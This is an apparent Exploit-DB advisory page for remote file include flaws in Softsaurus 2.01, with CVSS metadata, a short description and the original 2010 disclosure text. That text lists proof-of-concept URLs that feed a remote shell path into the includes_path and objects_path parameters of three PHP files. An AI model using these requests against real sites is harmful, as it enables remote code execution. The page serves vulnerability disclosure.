SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities

vendor:

Softsaurus

by:

cr4wl3r

9,3

CVSS

HIGH

Multiple Remote File Include

CWE

Product Name: Softsaurus

Affected Version From: 2.01

Affected Version To: 2.01

Patch Exists: YES

Related CWE: N/A

CPE: a:softsaurus:softsaurus:2.01

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities

SOFTSAURUS 2.01 is vulnerable to multiple remote file include vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary code on the vulnerable system. The vulnerable files are wallpapers.php, subHeader.php and objects_path. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request containing a URL-encoded path to a remote file that can be included and executed on the vulnerable system.

Mitigation:

Upgrade to the latest version of SOFTSAURUS 2.01 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

============================================================
SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities
============================================================

[+] SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities
[+] Discovered By: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original : http://inj3ct0r.com/exploits/11347
[+] Download: http://code.google.com/p/softsaurus/downloads/list

[+] PoC: [path]/content/plugins/wallpapers/wallpapers.php?includes_path=[Shell]
         [path]/content/themes/softsaurus_default/pages/subHeader.php?objects_path=[Shell]
         [path]/content/themes/softsaurus_stretched/pages/subHeader.php?objects_path=[Shell]

[+] Greetz: Inj3ct0r Team r0073r, 0x1D, bL4Ck_3n91n3


# Inj3ct0r.com [2010-03-18]